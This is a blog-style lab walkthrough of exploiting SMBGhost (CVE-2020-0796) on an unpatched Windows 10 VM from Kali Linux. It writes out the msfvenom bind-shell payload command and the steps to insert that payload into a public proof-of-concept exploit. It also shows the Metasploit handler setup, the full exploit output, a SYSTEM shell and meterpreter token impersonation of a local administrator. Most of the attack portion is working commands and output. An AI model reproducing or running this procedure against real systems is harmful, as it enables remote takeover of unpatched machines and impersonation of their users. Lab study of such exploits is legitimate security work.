Back in March Microsoft released a patch for KB4551762 / CVE-2020-0796, dubbed ‘SMBGhost’ the vulnerability affects Windows 10/2019 Server Message Block 3.11 and allows for remote code execution by sending a specially crafted packet.
I have succesfully labbed the SMGHost RCE demo by chompie1337. Lets whip out Kali Linux and get to work!
1. First off using VMware Workstation setup a Kali Linux 2020 VM and a Windows 10 1909 VM. Do not patch the Windows 10 VM, leave it vanilla for the demo purpose. In this example Kali ip is 10.1.1.1 and Windows 10 ip is 10.1.1.2. It assumed that both VMs have been setup and ready to use.
2. Download the exploit files from chompie1337 github here.
3. On your Kali VM, create a new msfvenom payload for tcp bind shell with the following command:
msfvenom - p windows / x64 / meterpreter / bind_tcp LPORT = 4444 - b '\x00' - i 1 - f python
4. Copy the msfvenon output and replace the shellcode into the USER_PAYLOAD section of exploit.py. I created a copy of the python file as exploit2.py with my modded msfvenon bind shell.
5. Still on the Kali VM, launch msfconsole and run the following:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set rhost 10.1.1.2
rhost => 10.1.1.2
msf5 exploit(multi/handler) > run
6. The bind shell is now setup and listening for connection from our target.
7. Open a new terminal and run the exploit:
kali@kali:~/SMBGhost_RCE_PoC-master$ python3 exploit2.py -ip 10.1.1.2
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff785c0000000
[+] found PML4 self-ref entry 1a6
[+] found HalpInterruptController at fffff785c0001478
[+] found HalpApicRequestInterrupt at fffff80609cb7bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffffd37bc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
8. Switch back to your msfconsole terminal window and you should see the following meterpreter output:
[*] Started bind TCP handler against 10.1.1.2:4444
[*] Sending stage (206403 bytes) to 10.1.1.2
[*] Meterpreter session 1 opened (10.1.1.1:33461 -> 10.1.1.2:4444) at 2020-06-09 01:25:48 -0400
meterpreter >
9. Success! Now lets check which user we are (nt authority\system) and impersonate a logged on user (in this case a local user ‘demo’ which is part of the administrators group):
meterpreter > shell
Process 4776 created.
Channel 3 created.
Microsoft Windows [Version 10.0.18363.418]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>exit
meterpreter > use icognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
DESKTOP-VQI7AUS\demo
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token DESKTOP-VQI7AUS\\demo
[+] Delegation token available
[+] Successfully impersonated user DESKTOP-VQI7AUS\demo
meterpreter > shell
Process 2980 created.
Channel 2 created.
Microsoft Windows [Version 10.0.18363.418]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
desktop-vqi7aus\demo
C:\Windows\system32>
9. So from here we are now the demo user on the Windows 10 VM and it is game over :). I used the meterpreter incognito mode to impersonate the user token and pop a shell as that user. I found the exploit pretty reliable, sometimes you get a BSOD when running it but more often than not it works. The user payload (remember our msfvenom output) needs to be 600 bytes or less or it will not work as per the readme on chompie1337’s github.
Comments